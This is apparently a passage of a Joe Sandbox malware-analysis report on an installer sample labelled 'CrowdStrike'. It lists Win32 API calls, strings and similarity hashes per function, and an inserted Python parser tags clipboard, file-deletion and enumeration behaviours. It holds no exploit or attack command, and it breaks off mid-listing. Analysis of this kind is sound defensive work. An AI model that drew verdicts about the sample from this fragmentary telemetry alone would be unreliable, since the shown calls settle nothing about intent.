                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                        • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                        • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                        • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                        APIs
                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                          • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                        • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                                        • String ID:
                                                                        • API String ID: 4115351271-0
                                                                        • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                        • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                        • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                        • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                        APIs
                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: FilePointer
                                                                        • String ID:
                                                                        • API String ID: 973152223-0
                                                                        • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                        • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                        • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                        • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                        • GetClientRect.USER32(?,?), ref: 00405196
                                                                        • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                        • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                        • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                        • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                          • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                        • CloseHandle.KERNEL32(00000000), ref: 004052C0
                                                                        • ShowWindow.USER32(00000000), ref: 004052E7
                                                                        • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                        • ShowWindow.USER32(00000008), ref: 00405333
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                        • CreatePopupMenu.USER32 ref: 00405376
                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                        • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                        • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                        • EmptyClipboard.USER32 ref: 00405411
                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                        • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405427
                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040545D
                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                        • CloseClipboard.USER32 ref: 0040546E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                        • String ID: @rD$New install of "%s" to "%s"${
                                                                        • API String ID: 2110491804-2409696222
                                                                        • Opcode ID: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                                                                        • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                        • Opcode Fuzzy Hash: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                                                                        • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                        • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                        • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                        • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                        • DeleteObject.GDI32(?), ref: 00404A79
                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                        • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                        • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                        • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                        • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                        • String ID: $ @$M$N
                                                                        • API String ID: 1638840714-3479655940
                                                                        • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                        • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                        • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                        • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                        • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                        • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                        • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                        • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                        • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                        • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                        • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                          • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                          • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                          • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000), ref: 00403E8F
                                                                        • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                        • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                        • String ID: 82D$@%F$@rD$A
                                                                        • API String ID: 3347642858-1086125096
                                                                        • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                        • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                        • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                        • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                        • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                        • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                        • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                        • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                        • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                        • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                        • API String ID: 1916479912-1189179171
                                                                        • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                        • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                        • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                        • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                        APIs
                                                                        • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                        • lstrcatW.KERNEL32(0045C918,\*.*), ref: 00406D09
                                                                        • lstrcatW.KERNEL32(?,00408838), ref: 00406D29
                                                                        • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                        • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                        • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                        • FindClose.KERNEL32(?), ref: 00406E33
                                                                        Strings
                                                                        • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                        • \*.*, xrefs: 00406D03
                                                                        • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                        • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                        • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                        • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                        • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                        • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                        • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                        • API String ID: 2035342205-3294556389
                                                                        • Opcode ID: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
                                                                        • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                        • Opcode Fuzzy Hash: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
                                                                        • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
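The listings above are the raw IDA-plugin export: one "APIs" block per function with a bullet per call (Api.MODULE(args), ref: address), subcall lines indented under the call that makes them, and a "Similarity" block whose API String ID and Opcode ID are the keys Joe Sandbox uses to match functions across samples. The following example is added here and is not part of the report or of Joe Sandbox; it parses that layout into records, names a few Win32 constants found in the raw arguments (SDK values, assumed for illustration), and tags each function with coarse behaviours so that a signature such as the clipboard one can be checked against the calls actually present: in the clipboard function listed above the data call is SetClipboardData with CF_UNICODETEXT (a write), while the Delete/RMDir function carries the DeleteFileW and FindFirstFileW calls. The input text is a constructed excerpt of two of the functions above, trimmed.

```python
"""Parse a Joe Sandbox per-function API export into records and tag behaviours (added example)."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed excerpt in the report's layout: two of the functions above, trimmed.
SAMPLE = """\
APIs
• OpenClipboard.USER32(00000000), ref: 0040540B
• EmptyClipboard.USER32 ref: 00405411
• GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
• SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
• SetClipboardData.USER32(0000000D,00000000), ref: 00405468
• CloseClipboard.USER32 ref: 0040546E
  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
Similarity
• API ID: MessageSend$Window$Clipboard
• API String ID: 2110491804-2409696222
• Opcode ID: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
APIs
• DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
• lstrcatW.KERNEL32(0045C918,\\*.*), ref: 00406D09
• FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
Similarity
• API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
• API String ID: 2035342205-3294556389
• Opcode ID: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
"""

# One call line: optional subcall prefix, Api.MODULE, optional (args), then ", ref: ADDR".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]{8})\s*$"
)
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>API String ID|Opcode ID|API ID):\s*(?P<val>.+?)\s*$")

# Win32 constants used to annotate raw arguments (SDK values, assumed for illustration).
WM_NAMES = {0x1004: "LVM_GETITEMCOUNT", 0x1073: "LVM_GETITEMTEXTW", 0x1102: "TVM_EXPAND",
            0x1109: "TVM_SETIMAGELIST", 0x110A: "TVM_GETNEXTITEM",
            0x1132: "TVM_INSERTITEMW", 0x113F: "TVM_SETITEMW"}
CF_NAMES = {0x01: "CF_TEXT", 0x0D: "CF_UNICODETEXT"}


@dataclass
class Call:
    api: str
    module: str
    args: list            # raw argument tokens; '?' is the report's unknown-value placeholder
    ref: int
    subcall_of: Optional[int] = None   # set when the report marks the call as part of a subcall

    def annotate(self) -> Optional[str]:
        """Name the constant in a well-known argument position, or None if not decodable."""
        try:
            if self.api == "SendMessageW":          # message id is the second argument
                return WM_NAMES.get(int(self.args[1], 16))
            if self.api == "SetClipboardData":      # clipboard format is the first argument
                return CF_NAMES.get(int(self.args[0], 16))
        except (IndexError, ValueError):            # '?' placeholder or missing argument
            pass
        return None


@dataclass
class Function:
    calls: list = field(default_factory=list)
    api_string_id: str = ""
    opcode_id: str = ""

    def behaviours(self) -> set:
        """Coarse tags, from the function's own calls only, to check a sandbox signature against."""
        apis = {c.api for c in self.calls if c.subcall_of is None}
        tags = set()
        if "SetClipboardData" in apis:
            tags.add("clipboard-write")
        if "GetClipboardData" in apis:
            tags.add("clipboard-read")
        if apis & {"DeleteFileW", "DeleteFileA", "RemoveDirectoryW"}:
            tags.add("file-delete")
        if apis & {"FindFirstFileW", "FindNextFileW"}:
            tags.add("dir-enum")
        return tags


def parse(text: str) -> list:
    """Split the export on 'APIs' headers; collect calls and the Similarity identifiers."""
    functions, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = Function()
            functions.append(cur)
            continue
        if cur is None:
            continue
        m = CALL_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
            cur.calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16),
                                  int(m["sub"], 16) if m["sub"] else None))
            continue
        f = FIELD_RE.match(line)
        if f and f["key"] == "API String ID":
            cur.api_string_id = f["val"]
        elif f and f["key"] == "Opcode ID":
            cur.opcode_id = f["val"]
    return functions


if __name__ == "__main__":
    for fn in parse(SAMPLE):
        print(fn.api_string_id, sorted(fn.behaviours()))
        for c in fn.calls:
            print(f"  {c.ref:08X} {c.api}.{c.module} {c.annotate() or ''}")
```

Argument tokens are split on commas, which is adequate for the hexadecimal and "?" tokens the report emits but would mis-split a quoted string that itself contains a comma; keep the raw line if that matters. Indexing the resulting functions by api_string_id or opcode_id gives a simple way to diff two reports from the same family and see which functions changed.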
                                                                        APIs
                                                                        • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                        • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                        • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                        • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                        • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
